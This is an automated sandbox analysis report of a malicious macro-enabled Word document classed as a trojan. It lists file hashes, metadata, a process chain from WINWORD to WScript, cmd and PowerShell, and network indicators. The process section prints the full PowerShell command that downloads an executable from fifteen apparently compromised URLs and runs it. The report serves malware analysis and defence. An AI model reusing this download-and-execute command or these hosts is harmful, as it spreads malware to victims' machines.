File name: DieKlage-01092020-326885536.doc

Full analysis: https://app.any.run/tasks/5b1bed2d-4473-4783-8ffd-ea780219083d
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: October 20, 2020, 08:03:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
macros-on-close
maldoc-55
trojan
opendir
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5: B8D08D412A4E2460E33A61433ED183AA
SHA1: 1B2BA0005E601B4153E422DCDC66F0A5AD3C9982
SHA256: CA94ABF398DF4677EA56D197B3C8756D3E7EFAD08E38D95B48A3A3BF15AE9FBE
SSDEEP: 1536:p+xp5P4yD6IMKPpY689zYhM7ZgzPYavEW++8U5KSFYqRYAZlPHvHkVfWtW:pi5PFoHmhcAY2+g5vt/vEWW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 1944)
    • Executes PowerShell scripts
      • cmd.exe (PID: 3336)
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 4072)
    • Starts CMD.EXE for commands execution
      • WScript.exe (PID: 1436)
    • Creates files in the program directory
      • WINWORD.EXE (PID: 1944)
    • Executes scripts
      • explorer.exe (PID: 3612)
    • Executed via COM
      • explorer.exe (PID: 3612)
    • Executes application which crashes
      • powershell.exe (PID: 4072)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 1944)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 1944)
    • Reads settings of System Certificates
      • powershell.exe (PID: 4072)
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

BaseTarget: C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: SPecialiST RePack
TitlesOfParts: -
HeadingPairs:
  • Название
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: 2 minutes
Template: Normal.dotm
ModifyDate: 2020:09:01 23:12:00Z
CreateDate: 2020:09:01 23:10:00Z
RevisionNumber: 4
LastModifiedBy: Пользователь Windows

XMP

Creator: Пользователь Windows

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1740
ZipCompressedSize: 447
ZipCRC: 0x38b3daca
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
Total processes: 45
Monitored processes: 8
Malicious processes: 4
Suspicious processes: 1

Behavior graph

Processes in the graph: winword.exe, explorer.exe, explorer.exe, wscript.exe, cmd.exe, powershell.exe, ntvdm.exe, timeout.exe (all marked "no specs" except powershell.exe)

Process information

PID: 1944
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DieKlage-01092020-326885536.doc.docm"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 3864
CMD: explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
Path: C:\Windows\explorer.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3612
CMD: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Path: C:\Windows\explorer.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1436
CMD: "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
Path: C:\Windows\System32\WScript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385

PID: 3336
CMD: cmd /c ""C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd" "
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 4072
CMD: POWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png','http://www.lelamantin.fr/uboljzeqfb/555555555.png','http://somethingspecialrd.com/emdnfin/555555555.png','http://www.intiming.it/zopnivucop/555555555.png','http://funminews.com/tdtmxmcjtkqo/555555555.png','http://lesehanpelangi.com/vswrdyzgo/555555555.png','http://anamtaexports.in/gbfrctzj/555555555.png','http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png','http://the-lobby.org/xqjzx/555555555.png','http://www.biocosmeticashop.com/tftkbe/555555555.png','http://birlafincorp.com/xoygkcfaea/555555555.png','http://shainasaw.com/bvjlok/555555555.png','http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png','http://marudhralive.com/ggyofqrt/555555555.png','http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png')) { try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2620
CMD: "C:\Windows\system32\ntvdm.exe" -i1
Path: C:\Windows\system32\ntvdm.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: NTVDM.EXE
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1296
CMD: TIMEOUT /T 10
Path: C:\Windows\system32\timeout.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: timeout - pauses command processing
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 225
Read events: 976
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 2
Text files: 4
Unknown types: 3

Dropped files

PID | Process | Filename | MD5 | SHA256
1944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3C62.tmp.cvr | - | -
1944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C27C76C.jpeg | - | -
1944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{11EEC6EE-DC08-47F0-A8B3-E8918DEEAD92}.tmp | - | -
1944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78052BA2-9F1F-46A4-A016-BF9C27D882DD}.tmp | - | -
1944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFED5644E9AC6913E6.TMP | - | -
1944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C3732D9F-A45C-494C-8F92-F76748D80BF1}.tmp | - | -
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FRHQE0Q5LA8J7KK1HTHS.temp | - | -
2620 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs25F7.tmp | - | -
2620 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs2617.tmp | - | -
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary | 91E6FD459449D894E9B434F085A75F9C | D7F710D6BA838016DDA48B25EB5D4F9AB3A526B58A71BB13502923BD61E51E37
HTTP(S) requests: 4
TCP/UDP connections: 9
DNS requests: 8
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
4072 | powershell.exe | GET | 301 | 108.167.132.112:80 | http://rodrigodecamargo.com.br/vhtderi/555555555.png | US | - | - | malicious
4072 | powershell.exe | GET | 302 | 209.99.40.222:80 | http://lesehanpelangi.com/vswrdyzgo/555555555.png | US | - | - | malicious
4072 | powershell.exe | GET | 404 | 74.220.207.171:80 | http://funminews.com/tdtmxmcjtkqo/555555555.png | US | html | 315 b | malicious
4072 | powershell.exe | GET | 404 | 173.254.28.216:80 | http://somethingspecialrd.com/emdnfin/555555555.png | US | html | 315 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4072 | powershell.exe | 108.167.132.112:80 | rodrigodecamargo.com.br | CyrusOne LLC | US | malicious
4072 | powershell.exe | 104.18.58.20:443 | www.steersearch.com | Cloudflare Inc | US | suspicious
4072 | powershell.exe | 209.99.40.222:80 | lesehanpelangi.com | Confluence Networks Inc | US | malicious
4072 | powershell.exe | 37.59.236.156:80 | www.intiming.it | OVH SAS | FR | malicious
4072 | powershell.exe | 213.186.33.24:443 | www.lelamantin.fr | OVH SAS | FR | malicious
4072 | powershell.exe | 173.254.28.216:80 | somethingspecialrd.com | Unified Layer | US | malicious
4072 | powershell.exe | 213.186.33.24:80 | www.lelamantin.fr | OVH SAS | FR | malicious
4072 | powershell.exe | 74.220.207.171:80 | funminews.com | Unified Layer | US | malicious

DNS requests

Domain | IP | Reputation
rodrigodecamargo.com.br | 108.167.132.112 | malicious
www.rodrigodecamargo.com.br | 108.167.132.112 | malicious
www.lelamantin.fr | 213.186.33.24 | malicious
somethingspecialrd.com | 173.254.28.216 | whitelisted
www.intiming.it | 37.59.236.156 | malicious
funminews.com | 74.220.207.171 | malicious
lesehanpelangi.com | 209.99.40.222 | malicious
www.steersearch.com | 104.18.58.20, 104.18.59.20, 172.67.219.128 | unknown

Threats

5 ETPRO signatures available at the full report
No debug info